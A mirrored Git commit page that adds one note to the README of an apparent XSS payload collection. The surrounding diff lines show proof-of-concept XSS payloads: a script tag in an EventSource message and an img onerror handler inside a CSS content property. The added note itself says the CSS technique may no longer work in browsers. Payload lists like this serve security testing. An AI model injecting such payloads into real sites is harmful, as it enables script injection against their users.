ch0ic3/XSS
1
0
Fork 0
mirror of https://github.com/ShadowByte1/XSS.git synced 2024-12-18 10:26:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
ShadowByte 2024-08-07 14:17:47 +10:00 committed by GitHub
parent c2c96ef08b
commit 83ea59c835
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 1 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
README.md
View File

@ -634,6 +634,7 @@ event: message\ndata: <script>alert('XSS via EventSource')</script>\n\n
CSS Content Property Injection CSS Content Property Injection
If an application allows user input in CSS properties without sanitization, it can lead to XSS. If an application allows user input in CSS properties without sanitization, it can lead to XSS.
Note:most browsers consider the content property text not html and this works under very certain conditions unsure whether the browser still accepts this however i have inserted here as a use case.
``` ```
<style> <style>
.content::before { content: '<img src=x onerror=alert("XSS via CSS Content Property")>'; } .content::before { content: '<img src=x onerror=alert("XSS via CSS Content Property")>'; }